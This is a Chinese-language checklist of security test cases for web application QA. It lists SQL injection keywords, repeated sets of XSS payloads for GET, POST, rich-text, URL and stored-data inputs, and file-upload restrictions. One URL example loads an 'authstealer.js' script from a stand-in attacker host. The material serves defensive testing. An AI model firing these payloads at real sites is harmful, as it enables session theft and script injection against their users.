1.sql注入
1.sql注入:
基本:update,delete,select,insert
特殊:or,and,sleep,concat,order
2.xss注入用例
2.xss注入用例:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<svg onerror=alert(`1`)/>
3.js脚本执行
3.js脚本执行:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
4.文件上传xss
文件名:xss的关键字,限制中英文数字。
文件格式:mp4,avi,wmv,flv,txt,pdf,xls,xlsx,doc,docx,jpg,png,gif,bmp,jpeg
文件内容:导入模板内容限制中英文数字、长度(100,40)
5.富文本输入、事件、提交
5.富文本输入、事件、提交:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
6.url地址xss
6.url地址xss:
http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>
http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
基本1:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
7.http头xss
修改头部属性信息,用工具测试。
X-Forwarded-For、X-Frame-Options、X-XSS-Protection
8.post数据xss
8.post数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
9.get数据xss
9.get数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
10.数据库存储数据xss
10.数据库存储数据xss:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
11.总结
测试用例:
1.sql注入:
基本:update,delete,select,insert
特殊:or,and,sleep,concat,order
2.xss注入用例:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<svg onerror=alert(`1`)/>
3.js脚本执行:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
4.文件上传xss:
文件名:xss的关键字,限制中英文数字。
文件格式:mp4,avi,wmv,flv,txt,pdf,xls,xlsx,doc,docx,jpg,png,gif,bmp,jpeg
文件内容:导入模板内容限制中英文数字、长度(100,40)
5.富文本输入、事件、提交:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
6.url地址xss:
http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>
http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
基本1:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
7.http头xss:
修改头部属性信息,用工具测试。
X-Forwarded-For、X-Frame-Options、X-XSS-Protection
8.post数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
9.get数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
10.数据库存储数据xss:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>